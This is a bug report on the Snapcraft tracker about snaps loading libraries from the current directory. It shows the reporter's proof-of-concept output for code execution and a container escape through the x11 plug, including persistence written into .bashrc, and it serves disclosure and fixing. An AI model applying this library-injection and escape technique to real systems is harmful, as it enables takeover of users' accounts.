snapd vulnerable to Library Injection from CWD
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Snapcraft |
Fix Released
|
Critical
|
Sergio Schvezov | ||
snapcraft (Ubuntu) |
Fix Released
|
High
|
Emilia Torino |
Bug Description
I discovered that snapcraft will include the current directory as a search path for LD_LIBRARY_PATH when the home plug is enabled.
This means any snap package with the home plug, which are command line can be taken over if the user has a malicious file or directory in their CWD.
This was found when a snap package crashed due to libc.so.6 being in the CWD search path:
itszn@ubuntu:
-rw-rw-r-- 1 itszn itszn 2030544 Oct 25 11:46 tls/libc.so.6
itszn@ubuntu:
Segmentation fault (core dumped)
We can figure out why this is happening by checking strace:
$ sudo strace -f -v -e execve -s 1000 sudo -u itszn vlc 2>&1 | egrep 'LD_LIBRARY_
LD_LIBRARY_
In the above variable, we see a :: this is the result of an empty env variable being used. This leads to
strange behavior in ld where it includes cwd in the search path (which I might also personally consider buggy).
The extra : is probably due to an empty path passed to either https:/
This bug means that any library not provided by the first search paths will be loaded from CWD, including libc.so.6
A malicious libc.so.6 could be crafted to get code exec within the container when loaded. Additionally this file could
be hidden in a subdirectory named either tls or x86_64.
This code execution can then abuse other plugs, such as the x11 plug, to interact with the rest of the
system and run a script by sending key presses to an open terminal.
I have included a poc which will work with snaps using core-18 with home and x11 plugs. (for example VLC and Chromium)
The impact of this is large as it effects the most installed snaps (based on https:/
POC:
Example running vlc in the POC directory:
-------
itszn@ubuntu:~$ tar xfvz snap-escape.tar.gz
itszn@ubuntu:~$ cd snap-escape
itszn@ubuntu:
total 8
-rw-rw-r-- 1 itszn itszn 0 Oct 25 11:04 amazing-movie.mp4
-rw-rw-r-- 1 itszn itszn 0 Oct 25 11:28 cool-page.html
-rw-rw-r-- 1 itszn itszn 2193 Oct 25 11:45 README.txt
drwxrwxr-x 3 itszn itszn 4096 Oct 25 11:28 tls
itszn@ubuntu:
Got code execution running as itszn inside snap container!
We can read/write any non-hidden (non-dot) file in
+ echo 'Hello from snap code exec' > /home/itszn/pwned
+ cat /home/itszn/pwned
Hello from snap code exec
However we are still restricted by the container
We cannot access dotfiles
+ echo 'echo PWNED' >> /home/itszn/.bashrc
./tls/s: 20: ./tls/s: cannot create /home/itszn/
Or other non-home files
+ cat /etc/issue
cat: /etc/issue: Permission denied
Luckily, this snap has the x11 plug
We can use this escape the container!
Starting container escape...
Escape Success!
We are now running code outside of snap container, we now have full privs of itszn
For example we now can read /etc/issue:
+ cat /etc/issue
Ubuntu 18.04.4 LTS \n \l
Or modify dotfiles
+ echo 'echo PWNED' >> /home/itszn/.bashrc
+ tail -n 1 /home/itszn/.bashrc
echo PWNED
Full escape and code execution~!
-------
Attached is the poc
CVE References
Changed in snapcraft: | |
status: | New → In Progress |
importance: | Undecided → Critical |
assignee: | nobody → Sergio Schvezov (sergiusens) |
Additionally here is the script I used to generate the malicious libc.so.6